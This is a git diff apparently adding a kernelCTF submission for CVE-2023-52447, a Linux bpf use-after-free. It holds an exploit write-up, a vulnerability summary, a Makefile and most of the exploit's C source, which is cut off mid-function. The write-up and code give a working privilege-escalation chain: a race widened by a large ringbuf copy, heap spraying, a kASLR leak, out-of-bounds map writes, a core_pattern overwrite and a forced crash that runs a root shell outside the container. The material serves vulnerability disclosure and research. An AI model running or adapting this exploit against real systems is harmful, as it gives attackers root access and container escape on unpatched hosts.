diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md
new file mode 100755
index 00000000..f4c8e28c
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md
@@ -0,0 +1,271 @@
# Exploit Tech Overview

Since https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bba1dc0b55ac, freeing a bpf map no longer synchronizes with an RCU grace period. Note that bpf programs run under rcu_read_lock(), and that looking up an arraymap inside an array_of_maps does not increase the arraymap's refcount. A bpf program can therefore obtain a reference to an arraymap without pinning it:

```c
    BPF_LD_MAP_FD(BPF_REG_9, array_of_map),
    BPF_MAP_GET_ADDR(0, BPF_REG_8),
    BPF_MOV64_REG(BPF_REG_9, BPF_REG_8),
    BPF_MAP_GET_ADDR(0, BPF_REG_8), // store an arraymap taken from array_of_map in BPF_REG_8 without increasing its refcount
```

In summary, the vulnerability is that a bpf program can hold an arraymap pointer without increasing its refcount when the pointer comes from an array_of_maps, as in the snippet above. If the program first stores such a pointer in a register and then performs a time-consuming operation, another thread gets a chance to free that arraymap and reclaim its memory for a different structure such as an array_of_maps. In our exploit, arraymap and array_of_maps are both allocated from the kmalloc-1024 cache.
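The snippets in this writeup use the `BPF_MAP_GET` and `BPF_MAP_GET_ADDR` helper macros. For reference, here is their definition from the exploit source (reproduced with added comments): both wrap a `bpf_map_lookup_elem` call with the map pointer expected in BPF_REG_9, and leave the looked-up value, or the value's address, in the chosen register:

```C
#define BPF_MAP_GET(idx, dst) \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* R1 = map */ \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* R2 = &key on the stack */ \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), \
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), /* bail out on NULL */ \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0), /* dst = *value */ \
    BPF_MOV64_IMM(BPF_REG_0, 0)

// BPF_MAP_GET_ADDR is identical except the final load is replaced by
//     BPF_MOV64_REG((dst), BPF_REG_0)   /* dst = &value */
```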
`bpf_ringbuf_output` is a bpf helper that uses memcpy to copy a caller-supplied buffer into the ringbuf at line [1]:
```C
BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size,
	   u64, flags)
{
	struct bpf_ringbuf_map *rb_map;
	void *rec;

	if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP)))
		return -EINVAL;

	rb_map = container_of(map, struct bpf_ringbuf_map, map);
	rec = __bpf_ringbuf_reserve(rb_map->rb, size);
	if (!rec)
		return -EAGAIN;

	memcpy(rec, data, size); //[1]
	bpf_ringbuf_commit(rec, flags, false /* discard */);
	return 0;
}
```

If the buffer is large, the copy takes a long time to finish, which makes it a good way to extend the race window between release and reclaim:

```C
// time-consuming operation: BPF_FUNC_ringbuf_output copies a large buffer
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),
BPF_MOV64_IMM(BPF_REG_3, 0x10000000),
BPF_MOV64_IMM(BPF_REG_4, 0x0),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output)
```

While the thread on one core is busy inside the bpf program, we use threads on other cores to free and reclaim. A mmapable bpf arraymap serves as the signal that tells userspace it may start freeing:

```c
    // Create a mmapable arraymap to signal that we have stored the target arraymap
    int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);
    // mmap the arraymap region so userspace can poll the signal.
    signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
                       signal, 0);
```

thread0 (inside the bpf program) writes the value `1` into our signal arraymap:
```c
    BPF_LD_MAP_FD(BPF_REG_9, signal),
    BPF_MAP_GET_ADDR(0, BPF_REG_7),
    BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 1), // write 1 to signal that we have stored the target arraymap
```

thread1 busy-waits until signal_addr becomes `1`, then frees the target:
```c
    while (signal_addr[0] == 0)
        ;
    // Free target
    update_elem(array_of_map, 0, victim);
```

thread2 busy-waits until signal_addr becomes `1`, then sprays array_of_maps to reclaim the freed chunk. A max_entries of 0x30 makes sure the sprayed array_of_maps come from kmalloc-1024, the same cache as the arraymap:

```c
    while (signal_addr[0] == 0)
        ;
    for (int i = 0; i < 0x100; i++) {
        spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
                                     0x30, samplemap);
        update_elem(spray_fd[i], 0, victim);
    }
```

The bpf program still treats the map address stored in BPF_REG_8 as an arraymap, but by now it is an array_of_maps:
```C
// Now BPF_REG_8 is freed and reallocated as an array_of_maps
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),
```

Through the malformed arraymap we can leak an arraymap address and the address of array_map_ops. Once we know the kernel address of array_map_ops, we can compute the kASLR base:
```
gef➤ p &array_map_ops
$2 = (const struct bpf_map_ops *) 0xffffffff829c29e0
gef➤ p _stext
$3 = {} 0xffffffff81000000
```

The corresponding bpf snippet:
```C
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0), // Now BPF_REG_8 is freed and reallocated as an array_of_maps
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 0), // store the leaked arraymap address into our arraymap as a value
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), // adjust the address so the fake map's value area overlays bpf_array.map
BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0, 0), // store our malformed arraymap into the array_of_maps
```

# Exploit Tech Detail

After winning the race, the exploit:

* Modifies the victim arraymap's max_entries and index_mask.
* Uses the victim arraymap to redirect the neighbouring array_of_maps' index-0 entry to (core_pattern - struct_bpf_array_offset).
* Updates the array_of_maps to modify core_pattern.
* Achieves container escape.

## Modify the victim arraymap's max_entries and index_mask

Because the stored value was adjusted to overlay bpf_array.map, we can create a bpf program that modifies map.max_entries and array->index_mask:

```C
    BPF_LD_MAP_FD(BPF_REG_9, target),
    BPF_MAP_GET_ADDR(0, BPF_REG_9),
    BPF_MAP_GET_ADDR(4, BPF_REG_8),
    BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), // modify map.max_entries

    BPF_MAP_GET_ADDR(0x20, BPF_REG_8),
    BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0xffff), // modify array->index_mask
```

We set map.max_entries to 0x800 so accesses can reach past the victim's kmalloc-1024 chunk into the next one, and array->index_mask to 0xffff to achieve OOB read/write in array_map_lookup_elem and array_map_update_elem:
```c
static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
...
	return array->value + (u64)array->elem_size * (index & array->index_mask);


static long array_map_update_elem(struct bpf_map *map, void *key, void *value,
				  u64 map_flags)
{
...
	val = array->value +
	      (u64)array->elem_size * (index & array->index_mask);
```

Later we use the bpf syscall to call array_map_lookup_elem/array_map_update_elem with out-of-range indices.
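From userspace this is just an ordinary lookup on the victim map with an oversized index. As a concrete example (this is what the exploit's main() does), reading value offset 0x400 through the victim dereferences the neighbouring kmalloc-1024 chunk:

```c
    // The value area starts at bpf_array + 0x110 and the chunk is 0x400 bytes,
    // so value offset 0x400 lands at offset 0x110 of the *next* chunk: the
    // index-0 inner map slot of a neighbouring array_of_maps.
    size_t val = get_elem(victim, (0x400 + 0x110 - 0x110) / 8);
```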
## Use the victim arraymap to redirect the neighbouring array_of_maps' index-0 entry to (core_pattern - struct_bpf_array_offset)

The out-of-bounds access through the victim modifies the next chunk's contents. We use heap feng shui and allocate some array_of_maps before and after the victim arraymap:

```c
    // Allocate some array of maps before victim
    for (int i = 0; i < 0x10; i++)
        oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30,
                                samplemap);
    victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

    // Allocate some array of maps after victim
    for (int i = 0; i < 0x10; i++)
        oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
                                       0x30, samplemap);
```

With this layout, the chunk after the victim is very likely an array_of_maps, and we overwrite its index-0 inner map pointer:
```c
    // Store the address (core_pattern - struct_bpf_array_offset) we want to write through.
    update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr);
```

## Update the array_of_maps to modify core_pattern

Create another bpf program that looks up the fake index-0 arraymap; its value area now overlays core_pattern, so writing its elements overwrites core_pattern:

```C
BPF_LD_MAP_FD(BPF_REG_9, target),
BPF_MAP_GET_ADDR(0, BPF_REG_9),
BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern
BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_7 will point to core_pattern+8
BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_6 will point to core_pattern+16

BPF_LD_MAP_FD(BPF_REG_9, data),

// Modify core_pattern to |/proc/%P/fd/666 %P
BPF_MAP_GET(0, BPF_REG_4),
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),
BPF_MAP_GET(1, BPF_REG_4),
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0),
BPF_MAP_GET(2, BPF_REG_4),
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
```
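The `data` map read by this program is plain arraymap storage; in the exploit's main() it is the victim map itself, pre-loaded with the new core_pattern string split into 8-byte values:

```c
    size_t *p = (size_t *)"|/proc/%P/fd/666 %P";
    // The program above copies indices 0..2 (24 bytes, covering the
    // 20-byte string) over core_pattern.
    for (int i = 0; i < 4; i++)
        update_elem(victim, i, p[i]);
```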
## Achieve container escape

After core_pattern has been overwritten to `|/proc/%P/fd/666 %P`, we create a memfd, copy our own executable into it, and install it as fd 666:
```C
int check_core()
{
	// Check if /proc/sys/kernel/core_pattern has been overwritten
	char buf[0x100] = {};
	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
	read(core, buf, sizeof(buf));
	close(core);
	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
	int memfd = memfd_create("", 0);
	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
	dup2(memfd, 666);
	close(memfd);
	while (check_core() == 0)
		sleep(1);
	puts("Root shell !!");
	/* Trigger a crash so the kernel executes the program from core_pattern, which is our "root" binary */
	*(size_t *)0 = 0;
}
```

When the coredump happens, the kernel executes our file as root in the root namespaces:
```C
*(size_t *)0 = 0; // trigger coredump
```

The code that then runs as root looks like this:
```c
// This section of code will be executed as root!
int pid = strtoull(argv[1], 0, 10);
int pfd = syscall(SYS_pidfd_open, pid, 0);
int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
dup2(stdinfd, 0);
dup2(stdoutfd, 1);
dup2(stderrfd, 2);
/* Get the flag and spawn a shell (the packaged exploit instead powers off
   immediately to speed up the next round of the PR verification workflow) */
system("cat /flag");
execlp("bash", "bash", NULL);
```
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md
new file mode 100755
index 00000000..b4c36e77
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md
@@ -0,0 +1,12 @@
- Requirements:
  - Capabilities: N/A
  - Kernel configuration: CONFIG_BPF_SYSCALL=y
  - User namespaces required: No
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=bba1dc0b55ac462d24ed1228ad49800c238cd6d7
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368
- Affected Version: v5.8 - v6.6
- Affected Component: bpf
- Syscall to disable: bpf
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52447
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's bpf subsystem. When a map element is updated or deleted, the release of the old element must be deferred (RCU-delayed); releasing it immediately lets a concurrently running bpf program incur a use-after-free. We recommend upgrading past commit 876673364161da50eed6b472d746ef88242b2368.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile
new file mode 100755
index 00000000..71952bf8
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile
@@ -0,0 +1,7 @@
all: exploit

exploit: exploit.c
	gcc -o exploit exploit.c -static -pthread

clean:
	rm -rf exploit
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit
new file mode 100755
index 00000000..5a4fb23d
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c
new file mode 100755
index 00000000..5cf26b4a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c
@@ -0,0 +1,585 @@
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))
#ifndef SYS_pidfd_getfd
#define SYS_pidfd_getfd 438
#endif
#define SYSCHK(x) \
	({ \
		typeof(x) __res = (x); \
		if (__res == (typeof(x))-1) \
			err(1, "SYSCHK(" #x ")"); \
		__res; \
	})

#define PAUSE \
	{ \
		printf(":"); \
		int x; \
		read(0, &x, 1); \
	}
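/*
 * The bpf constants below are defined by hand (values taken from the kernel
 * UAPI: BPF_MAP_TYPE_RINGBUF = 27, ringbuf helper IDs 130-134,
 * BPF_F_MMAPABLE = 1 << 10), presumably so the exploit also builds against
 * older userspace headers that predate the ringbuf API.
 */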
#define BPF_F_MMAPABLE 1024
#define BPF_FUNC_ringbuf_query 134
#define BPF_FUNC_ringbuf_reserve 131
#define BPF_MAP_TYPE_RINGBUF 27
#define BPF_FUNC_ringbuf_discard 133
#define BPF_FUNC_ringbuf_output 130

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
	((struct bpf_insn){ .code = CODE, \
			    .dst_reg = DST, \
			    .src_reg = SRC, \
			    .off = OFF, \
			    .imm = IMM })

#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
	((struct bpf_insn){ .code = BPF_LD | BPF_DW | BPF_IMM, \
			    .dst_reg = DST, \
			    .src_reg = SRC, \
			    .off = 0, \
			    .imm = (__u32)(IMM) }), \
	((struct bpf_insn){ .code = 0, \
			    .dst_reg = 0, \
			    .src_reg = 0, \
			    .off = 0, \
			    .imm = ((__u64)(IMM)) >> 32 })

#define BPF_MOV64_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_RSH_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_RSH | BPF_X, DST, SRC, 0, 0)

#define BPF_LSH_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_LSH | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_IMM(OP, DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_REG(OP, DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU_IMM(OP, DST, IMM) \
	BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
	BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
	BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_LD_MAP_FD(DST, MAP_FD) \
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
	BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_LD_ABS(SIZE, IMM) \
	((struct bpf_insn){ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
			    .dst_reg = 0, \
			    .src_reg = 0, \
			    .off = 0, \
			    .imm = IMM })

#define BPF_MAP_GET(idx, dst) \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \
		     BPF_FUNC_map_lookup_elem), \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \
	BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0), \
	BPF_MOV64_IMM(BPF_REG_0, 0)

#define BPF_MAP_GET_ADDR(idx, dst) \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \
		     BPF_FUNC_map_lookup_elem), \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \
	BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0)

#define LOG_BUF_SIZE 65536
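/*
 * BPF_HEAVY_JOB expects a ringbuf map fd in R6 and a pointer to a reserved
 * 0x10000000-byte record in R7; bpf_ringbuf_output() then memcpy()s 256 MiB,
 * which is the long-running operation that holds the race window open.
 */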
#define BPF_HEAVY_JOB \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), \
	BPF_MOV64_IMM(BPF_REG_3, 0x10000000), \
	BPF_MOV64_IMM(BPF_REG_4, 0x0), \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \
		     BPF_FUNC_ringbuf_output)

#define INST(x) (sizeof(x) / sizeof(struct bpf_insn))

char bpf_log_buf[LOG_BUF_SIZE];
char buf[0x1000];

void set_cpu(int i)
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(i, &mask);
	sched_setaffinity(0, sizeof(mask), &mask);
}

int bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
		   unsigned int value_size, unsigned int max_entries,
		   unsigned int map_fd)
{
	union bpf_attr attr = { .map_type = map_type,
				.key_size = key_size,
				.value_size = value_size,
				.max_entries = max_entries,
				.inner_map_fd = map_fd };

	return SYSCHK(syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr)));
}

int bpf_create_map_mmap(enum bpf_map_type map_type, unsigned int key_size,
			unsigned int value_size, unsigned int max_entries,
			unsigned int map_fd)
{
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries,
		.inner_map_fd = map_fd,
		.map_flags = BPF_F_MMAPABLE,
	};

	return SYSCHK(syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr)));
}

int bpf_lookup_elem(int fd, const void *key, void *value)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
	};

	return SYSCHK(
		syscall(__NR_BPF, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)));
}

int bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags)
{
	union bpf_attr attr = {
		.map_fd = fd,
		.key = ptr_to_u64(key),
		.value = ptr_to_u64(value),
		.flags = flags,
	};

	return SYSCHK(
		syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)));
}

int bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
		  int insn_cnt, const char *license)
{
	union bpf_attr attr = {
		.prog_type = type,
		.insns = ptr_to_u64(insns),
		.insn_cnt = insn_cnt,
		.license = ptr_to_u64(license),
		.log_buf = ptr_to_u64(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 3,
	};

	return syscall(__NR_BPF, BPF_PROG_LOAD, &attr, sizeof(attr));
}

void *write_msg(void *x)
{
	int fd = *(int *)x;

	ssize_t n = write(fd, buf, 1);
	return NULL;
}

int update_elem(int mapfd, int key, size_t val)
{
	return bpf_update_elem(mapfd, &key, &val, 0);
}

size_t get_elem(int mapfd, int key)
{
	size_t val;
	bpf_lookup_elem(mapfd, &key, &val);
	return val;
}

void load_bpf_prog(struct bpf_insn *prog, int prog_cnt, int *sfd)
{
	int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, prog_cnt,
				   "GPL");
	if (progfd < 0) {
		puts("Fail");
		puts(bpf_log_buf);
		exit(0);
	}
	socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd);
	setsockopt(sfd[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd));
	close(progfd);
}
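/*
 * Note: the programs are attached as socket filters to one end of a datagram
 * socketpair, so writing a byte into the other end (see write_msg() and
 * write_core_pattern()) is what actually makes the kernel run a program.
 */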
int init_exploit_prog(struct bpf_insn **ret, int target, int data)
{
	struct bpf_insn prog[] = {
		BPF_LD_MAP_FD(BPF_REG_9, target),
		BPF_MAP_GET_ADDR(0, BPF_REG_9),
		BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern
		BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_7 will point to core_pattern+8
		BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_6 will point to core_pattern+16

		BPF_LD_MAP_FD(BPF_REG_9, data),

		// Modify core_pattern to |/proc/%P/fd/666 %P
		BPF_MAP_GET(0, BPF_REG_4),
		BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0),
		BPF_MAP_GET(1, BPF_REG_4),
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0),
		BPF_MAP_GET(2, BPF_REG_4),
		BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0),

		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	*ret = calloc(1, sizeof(prog));
	memcpy(*ret, prog, sizeof(prog));
	return INST(prog);
}

size_t write_core_pattern(int target, int data)
{
	int sfd[2];

	// load the exploit program and trigger it
	struct bpf_insn *exploit_prog = NULL;
	int exploit_prog_cnt = init_exploit_prog(&exploit_prog, target, data);
	load_bpf_prog(exploit_prog, exploit_prog_cnt, sfd);
	write(sfd[0], buf, 1);
	close(sfd[0]);
	close(sfd[1]);
	free(exploit_prog);
	return 0;
}

int init_leak_prog(struct bpf_insn **ret, int target, int data)
{
	// Use a bpf program to get the address of array_map_ops
	struct bpf_insn prog[] = {
		BPF_LD_MAP_FD(BPF_REG_9, target),
		BPF_MAP_GET_ADDR(0, BPF_REG_9),
		BPF_MAP_GET(0, BPF_REG_8),
		BPF_LD_MAP_FD(BPF_REG_9, data),
		BPF_MAP_GET_ADDR(0, BPF_REG_9),
		BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0), // store array_map_ops

		BPF_LD_MAP_FD(BPF_REG_9, target),
		BPF_MAP_GET_ADDR(0, BPF_REG_9),
		BPF_MAP_GET_ADDR(4, BPF_REG_8),
		BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), // modify map.max_entries

		BPF_MAP_GET_ADDR(0x20, BPF_REG_8),
		BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0xffff), // modify array->index_mask

		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	*ret = calloc(1, sizeof(prog));
	memcpy(*ret, prog, sizeof(prog));
	return INST(prog);
}
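/*
 * leak_kbase() runs the leak program against one sprayed map fd: the value
 * read back is the leaked &array_map_ops. The hardcoded addresses below are
 * specific to this cos-105-17412.294.10 build; the arithmetic converts the
 * leak into core_pattern - 0x110, i.e. the address of a fake bpf_array whose
 * value area overlays core_pattern.
 */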
size_t leak_kbase(int target)
{
	int sfd[2];
	int data = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x10, 0);

	// load the leak program and trigger it
	struct bpf_insn *leak_prog = NULL;
	int leak_prog_cnt = init_leak_prog(&leak_prog, target, data);
	load_bpf_prog(leak_prog, leak_prog_cnt, sfd);
	write(sfd[0], buf, 1);
	size_t ret = get_elem(data, 0);
	close(data);
	close(sfd[0]);
	close(sfd[1]);
	free(leak_prog);
#define core_pattern 0xffffffff8359e7a0
#define array_map_ops 0xffffffff829c29e0
#define struct_bpf_array_offset 0x110
	return ret - array_map_ops + core_pattern - struct_bpf_array_offset;
}

int init_race_prog(struct bpf_insn **ret, int array_of_map, int *ringbuf,
		   int arraymap, int signal)
{
	struct bpf_insn prog[] = {
		BPF_LD_MAP_FD(BPF_REG_9, array_of_map),
		BPF_MAP_GET_ADDR(0, BPF_REG_8),
		BPF_MOV64_REG(BPF_REG_9, BPF_REG_8),
		BPF_MAP_GET_ADDR(0, BPF_REG_8), // store an arraymap taken from array_of_map in BPF_REG_8 without increasing its refcount

		BPF_LD_MAP_FD(BPF_REG_9, signal),
		BPF_MAP_GET_ADDR(0, BPF_REG_7),
		BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 1), // write 1 to signal that we have stored the target arraymap

		BPF_LD_MAP_FD(BPF_REG_9, arraymap),
		BPF_MAP_GET_ADDR(0, BPF_REG_9), // BPF_REG_9 = our arraymap's value slot; the leaked address is stored here later

		BPF_LD_MAP_FD(BPF_REG_1, ringbuf[0]),
		BPF_MOV64_IMM(BPF_REG_2, 0x10000000),
		BPF_MOV64_IMM(BPF_REG_3, 0x0),
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,
			     BPF_FUNC_ringbuf_reserve), // reserve a huge buffer from the ringbuf
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
		BPF_EXIT_INSN(),
		BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),
		BPF_LD_MAP_FD(BPF_REG_6, ringbuf[1]),

		// time-consuming operation: BPF_FUNC_ringbuf_output copies the large buffer
		BPF_HEAVY_JOB,

		BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
		BPF_MOV64_IMM(BPF_REG_2, 0x1),
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,
			     BPF_FUNC_ringbuf_discard), // discard the previously reserved buffer
